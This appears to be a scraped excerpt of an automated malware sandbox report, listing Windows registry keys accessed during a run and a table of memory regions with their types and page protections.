HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
|
SpellingAndGrammarFiles_3082
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
|
SpellingAndGrammarFiles_3082
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1036
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1036
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
|
Settings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
|
MTTF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
|
MTTA
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 436 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
3ED8000
|
trusted library allocation
|
page read and write
|
|
|
|
4F1000
|
heap
|
page read and write
|
|
|
|
6BF000
|
heap
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
283000
|
trusted library allocation
|
page execute and read and write
|
||
|
380E000
|
stack
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
5BDE000
|
stack
|
page read and write
|
||
|
2BBB000
|
heap
|
page read and write
|
||
|
42C0000
|
trusted library allocation
|
page read and write
|
||
|
2B62000
|
heap
|
page read and write
|
||
|
36AE000
|
stack
|
page read and write
|
||
|
DE000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
384C000
|
stack
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
235E000
|
stack
|
page read and write
|
||
|
21FE000
|
stack
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2B2A000
|
heap
|
page read and write
|
||
|
6F7000
|
heap
|
page read and write
|
||
|
1E80000
|
direct allocation
|
page read and write
|
||
|
29FF000
|
stack
|
page read and write
|
||
|
425C000
|
stack
|
page read and write
|
||
|
4330000
|
trusted library allocation
|
page read and write
|
||
|
2DCC000
|
heap
|
page read and write
|
||
|
25B000
|
stack
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
201F000
|
stack
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
2B3A000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
396C000
|
stack
|
page read and write
|
||
|
21C000
|
stack
|
page read and write
|
||
|
215F000
|
stack
|
page read and write
|
||
|
23F4000
|
heap
|
page read and write
|
||
|
2260000
|
heap
|
page read and write
|
||
|
68C000
|
heap
|
page read and write
|
||
|
4440000
|
trusted library allocation
|
page read and write
|
||
|
284000
|
trusted library allocation
|
page read and write
|
||
|
2BC8000
|
heap
|
page read and write
|
||
|
2DDB000
|
heap
|
page read and write
|
||
|
707000
|
heap
|
page read and write
|
||
|
2DDA000
|
heap
|
page read and write
|
||
|
290000
|
trusted library allocation
|
page read and write
|
||
|
3A7000
|
heap
|
page read and write
|
||
|
33F0000
|
trusted library allocation
|
page read and write
|
||
|
23A8000
|
heap
|
page read and write
|
||
|
2B1D000
|
heap
|
page read and write
|
||
|
2AFE000
|
stack
|
page read and write
|
||
|
60FE000
|
stack
|
page read and write
|
||
|
3690000
|
heap
|
page read and write
|
||
|
2DC8000
|
heap
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
44FF000
|
stack
|
page read and write
|
||
|
5E3000
|
heap
|
page read and write
|
||
|
411F000
|
stack
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
2B72000
|
heap
|
page read and write
|
||
|
913000
|
heap
|
page read and write
|
||
|
80F000
|
heap
|
page read and write
|
||
|
4958000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
1C69000
|
heap
|
page read and write
|
||
|
252F000
|
stack
|
page read and write
|
||
|
24DE000
|
stack
|
page read and write
|
||
|
237F000
|
stack
|
page read and write
|
||
|
2B4D000
|
heap
|
page read and write
|
||
|
42F0000
|
heap
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
33BE000
|
stack
|
page read and write
|
||
|
4320000
|
trusted library allocation
|
page read and write
|
||
|
526000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
1C0A000
|
stack
|
page read and write
|
||
|
7EF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F0A000
|
heap
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
36FF000
|
heap
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
2F7D000
|
stack
|
page read and write
|
||
|
2B36000
|
heap
|
page read and write
|
||
|
21B0000
|
heap
|
page execute and read and write
|
||
|
2B22000
|
heap
|
page read and write
|
||
|
1CEE000
|
stack
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
4420000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D61000
|
heap
|
page read and write
|
||
|
2B6F000
|
heap
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
39A0000
|
heap
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
2B1E000
|
heap
|
page read and write
|
||
|
2B6A000
|
heap
|
page read and write
|
||
|
3ADF000
|
stack
|
page read and write
|
||
|
1B50000
|
trusted library allocation
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
3980000
|
heap
|
page read and write
|
||
|
363000
|
heap
|
page read and write
|
||
|
52F000
|
heap
|
page read and write
|
||
|
4CA0000
|
heap
|
page read and write
|
||
|
1CF0000
|
trusted library allocation
|
page read and write
|
||
|
4D5000
|
heap
|
page read and write
|
||
|
69E000
|
heap
|
page read and write
|
||
|
6160000
|
heap
|
page read and write
|
||
|
35E000
|
stack
|
page read and write
|
||
|
5F7F000
|
stack
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
23AB000
|
heap
|
page read and write
|
||
|
4310000
|
trusted library allocation
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
2B2B000
|
heap
|
page read and write
|
||
|
311E000
|
stack
|
page read and write
|
||
|
5CCE000
|
stack
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
48F0000
|
trusted library allocation
|
page read and write
|
||
|
80F000
|
heap
|
page read and write
|
||
|
3DDD000
|
stack
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
4C7E000
|
stack
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
3CDD000
|
stack
|
page read and write
|
||
|
5C40000
|
heap
|
page read and write
|
||
|
3FE000
|
stack
|
page read and write
|
||
|
4B5F000
|
stack
|
page read and write
|
||
|
2B2000
|
trusted library allocation
|
page read and write
|
||
|
6A4000
|
heap
|
page read and write
|
||
|
4442000
|
trusted library allocation
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
27F000
|
stack
|
page read and write
|
||
|
3E9000
|
heap
|
page read and write
|
||
|
2B84000
|
heap
|
page read and write
|
||
|
392F000
|
stack
|
page read and write
|
||
|
48EE000
|
stack
|
page read and write
|
||
|
2BA3000
|
heap
|
page read and write
|
||
|
35E9000
|
trusted library allocation
|
page read and write
|
||
|
65F000
|
heap
|
page read and write
|
||
|
319000
|
heap
|
page read and write
|
||
|
4410000
|
trusted library allocation
|
page read and write
|
||
|
1CAC000
|
stack
|
page read and write
|
||
|
1C60000
|
heap
|
page read and write
|
||
|
2B1E000
|
heap
|
page read and write
|
||
|
82CF000
|
trusted library allocation
|
page read and write
|
||
|
1D50000
|
trusted library allocation
|
page read and write
|
||
|
366E000
|
stack
|
page read and write
|
||
|
2130000
|
heap
|
page read and write
|
||
|
2250000
|
trusted library allocation
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
4950000
|
trusted library allocation
|
page read and write
|
||
|
4F0E000
|
heap
|
page read and write
|
||
|
2BC8000
|
heap
|
page read and write
|
||
|
2B59000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
362F000
|
stack
|
page read and write
|
||
|
299000
|
trusted library allocation
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
32C9000
|
trusted library allocation
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
A8000
|
heap
|
page read and write
|
||
|
31E000
|
stack
|
page read and write
|
||
|
3EDF000
|
stack
|
page read and write
|
||
|
911000
|
heap
|
page read and write
|
||
|
80C000
|
heap
|
page read and write
|
||
|
2B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
5B6000
|
heap
|
page read and write
|
||
|
415D000
|
stack
|
page read and write
|
||
|
2412000
|
heap
|
page read and write
|
||
|
3409000
|
trusted library allocation
|
page read and write
|
||
|
8329000
|
trusted library allocation
|
page read and write
|
||
|
5E4000
|
heap
|
page read and write
|
||
|
2B35000
|
heap
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
5D0E000
|
stack
|
page read and write
|
||
|
2CD000
|
stack
|
page read and write
|
||
|
4EE0000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
2BB9000
|
heap
|
page read and write
|
||
|
638E000
|
stack
|
page read and write
|
||
|
6481000
|
trusted library allocation
|
page read and write
|
||
|
22DA000
|
trusted library allocation
|
page read and write
|
||
|
4F57000
|
heap
|
page read and write
|
||
|
5B5000
|
heap
|
page read and write
|
||
|
4EE4000
|
heap
|
page read and write
|
||
|
654000
|
heap
|
page read and write
|
||
|
352E000
|
stack
|
page read and write
|
||
|
27C000
|
stack
|
page read and write
|
||
|
2B67000
|
heap
|
page read and write
|
||
|
2110000
|
trusted library allocation
|
page read and write
|
||
|
561000
|
heap
|
page read and write
|
||
|
54D000
|
heap
|
page read and write
|
||
|
23DB000
|
trusted library allocation
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
8FE000
|
heap
|
page read and write
|
||
|
32C000
|
stack
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
337000
|
heap
|
page read and write
|
||
|
495D000
|
trusted library allocation
|
page read and write
|
||
|
2DCC000
|
heap
|
page read and write
|
||
|
2BD5000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
3C1F000
|
stack
|
page read and write
|
||
|
2DDA000
|
heap
|
page read and write
|
||
|
8ED000
|
heap
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
342000
|
heap
|
page read and write
|
||
|
493E000
|
stack
|
page read and write
|
||
|
2BAC000
|
heap
|
page read and write
|
||
|
82D9000
|
trusted library allocation
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
4330000
|
trusted library allocation
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
28D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F83000
|
heap
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
A36000
|
heap
|
page read and write
|
||
|
5DCE000
|
stack
|
page read and write
|
||
|
8231000
|
trusted library allocation
|
page read and write
|
||
|
53F000
|
heap
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
230000
|
trusted library allocation
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
2B6A000
|
heap
|
page read and write
|
||
|
3FDD000
|
stack
|
page read and write
|
||
|
4B7000
|
heap
|
page read and write
|
||
|
1EE000
|
stack
|
page read and write
|
||
|
3402000
|
trusted library allocation
|
page read and write
|
||
|
517000
|
heap
|
page read and write
|
||
|
4B5E000
|
stack
|
page read and write | page guard
|
||
|
252F000
|
stack
|
page read and write
|
||
|
2B2C000
|
heap
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
3870000
|
heap
|
page read and write
|
||
|
5E0D000
|
stack
|
page read and write
|
||
|
5C62000
|
heap
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
1E5D000
|
stack
|
page read and write
|
||
|
21A0000
|
trusted library allocation
|
page read and write
|
||
|
5D6F000
|
stack
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
36ED000
|
heap
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
82FD000
|
trusted library allocation
|
page read and write
|
||
|
5C1F000
|
trusted library allocation
|
page read and write
|
||
|
223E000
|
stack
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
2BC8000
|
heap
|
page read and write
|
||
|
4DBD000
|
heap
|
page read and write
|
||
|
39D000
|
heap
|
page read and write
|
||
|
456000
|
stack
|
page read and write
|
||
|
2DD6000
|
heap
|
page read and write
|
||
|
B8E000
|
stack
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
1D80000
|
trusted library allocation
|
page read and write
|
||
|
4396000
|
heap
|
page execute and read and write
|
||
|
49FB000
|
stack
|
page read and write
|
||
|
6230000
|
trusted library section
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
80A000
|
heap
|
page read and write
|
||
|
4330000
|
trusted library allocation
|
page read and write
|
||
|
1BC0000
|
trusted library allocation
|
page read and write
|
||
|
1D59000
|
trusted library allocation
|
page read and write
|
||
|
1C5C000
|
stack
|
page read and write
|
||
|
367000
|
heap
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
A9D000
|
stack
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
21F0000
|
trusted library allocation
|
page read and write
|
||
|
BDE000
|
stack
|
page read and write
|
||
|
4EDE000
|
stack
|
page read and write
|
||
|
23D0000
|
heap
|
page read and write
|
||
|
2B22000
|
heap
|
page read and write
|
||
|
2DCD000
|
heap
|
page read and write
|
||
|
82D7000
|
trusted library allocation
|
page read and write
|
||
|
2BD3000
|
heap
|
page read and write
|
||
|
28FF000
|
stack
|
page read and write
|
||
|
280000
|
trusted library allocation
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
A0000
|
heap
|
page read and write
|
||
|
6B3000
|
heap
|
page read and write
|
||
|
2B36000
|
heap
|
page read and write
|
||
|
2DC6000
|
heap
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
2B5E000
|
heap
|
page read and write
|
||
|
32A1000
|
trusted library allocation
|
page read and write
|
||
|
68D000
|
heap
|
page read and write
|
||
|
1B52000
|
trusted library allocation
|
page read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
2B52000
|
heap
|
page read and write
|
||
|
2BCE000
|
heap
|
page read and write
|
||
|
2F7000
|
stack
|
page read and write
|
||
|
2D61000
|
heap
|
page read and write
|
||
|
CC000
|
stack
|
page read and write
|
||
|
212E000
|
stack
|
page read and write
|
||
|
5C44000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
219B000
|
stack
|
page read and write
|
||
|
1D57000
|
trusted library allocation
|
page read and write
|
||
|
4D9D000
|
stack
|
page read and write
|
||
|
2B36000
|
heap
|
page read and write
|
||
|
34ED000
|
stack
|
page read and write
|
||
|
728000
|
heap
|
page read and write
|
||
|
5BC000
|
heap
|
page read and write
|
||
|
4F77000
|
heap
|
page read and write
|
||
|
2B88000
|
heap
|
page read and write
|
||
|
48A0000
|
trusted library allocation
|
page read and write
|
||
|
22A1000
|
trusted library allocation
|
page read and write
|
||
|
B4E000
|
stack
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
4330000
|
trusted library allocation
|
page read and write
|
||
|
1D3E000
|
stack
|
page read and write
|
||
|
4A9E000
|
stack
|
page read and write
|
||
|
1B60000
|
trusted library allocation
|
page read and write
|
||
|
2DDA000
|
heap
|
page read and write
|
||
|
213F000
|
stack
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
647E000
|
stack
|
page read and write
|
||
|
2C31000
|
heap
|
page read and write
|
||
|
5E5000
|
heap
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
2B41000
|
heap
|
page read and write
|
||
|
3714000
|
heap
|
page read and write
|
||
|
4EC000
|
heap
|
page read and write
|
||
|
2BAF000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
53D000
|
heap
|
page read and write
|
||
|
7EF000
|
stack
|
page read and write
|
||
|
4C2E000
|
stack
|
page read and write
|
||
|
38EC000
|
stack
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
2B21000
|
heap
|
page read and write
|
||
|
2240000
|
trusted library allocation
|
page read and write
|
||
|
A18000
|
heap
|
page read and write
|
||
|
5F80000
|
heap
|
page read and write
|
||
|
549000
|
heap
|
page read and write
|
||
|
2B36000
|
heap
|
page read and write
|
||
|
42B0000
|
trusted library allocation
|
page read and write
|
||
|
285E000
|
stack
|
page read and write
|
||
|
3BDE000
|
stack
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
4EF0000
|
heap
|
page read and write
|
||
|
1B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
255C000
|
trusted library allocation
|
page read and write
|
||
|
90E000
|
heap
|
page read and write
|
||
|
82D1000
|
trusted library allocation
|
page read and write
|
||
|
4940000
|
trusted library allocation
|
page read and write
|
||
|
8316000
|
trusted library allocation
|
page read and write
|
||
|
2B8B000
|
heap
|
page read and write
|
||
|
4340000
|
trusted library allocation
|
page read and write
|
||
|
2B32000
|
heap
|
page read and write
|
||
|
4B0E000
|
stack
|
page read and write
|
||
|
36D0000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
2B46000
|
heap
|
page read and write
|
||
|
534000
|
heap
|
page read and write
|
||
|
622E000
|
stack
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
6A1000
|
heap
|
page read and write
|
||
|
1E60000
|
heap
|
page read and write
|
||
|
4DA0000
|
heap
|
page read and write
|
||
|
44B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
45C000
|
stack
|
page read and write
|
||
|
4390000
|
heap
|
page execute and read and write
|
||
|
2D7000
|
heap
|
page read and write
|
||
|
532000
|
heap
|
page read and write
|
||
|
726000
|
heap
|
page read and write
|
||
|
4BDE000
|
stack
|
page read and write
|
||
|
23A4000
|
heap
|
page read and write
|
||
|
1E70000
|
heap
|
page read and write
|
||
|
401F000
|
stack
|
page read and write
|
||
|
2BCD000
|
heap
|
page read and write
|
||
|
42A0000
|
trusted library allocation
|
page read and write
|
||
|
120000
|
heap
|
page read and write
|
||
|
637000
|
heap
|
page read and write
|
||
|
269E000
|
stack
|
page read and write
|
||
|
4790000
|
heap
|
page read and write
|
||
|
370F000
|
heap
|
page read and write
|
||
|
18A000
|
stack
|
page read and write
|
||
|
5E9D000
|
stack
|
page read and write
|
||
|
430E000
|
stack
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
448B000
|
stack
|
page read and write
|
||
|
80E000
|
heap
|
page read and write
|
||
|
5F7E000
|
stack
|
page read and write | page guard
|
||
|
357000
|
heap
|
page read and write
|
||
|
5DF000
|
heap
|
page read and write
|
||
|
324000
|
heap
|
page read and write
|
||
|
1BBD000
|
stack
|
page read and write
|
||
|
2B31000
|
heap
|
page read and write
|
||
|
5EEF000
|
stack
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
215E000
|
stack
|
page read and write | page guard
|
||
|
10000
|
heap
|
page read and write
|
There are 405 hidden memdumps, click here to show them.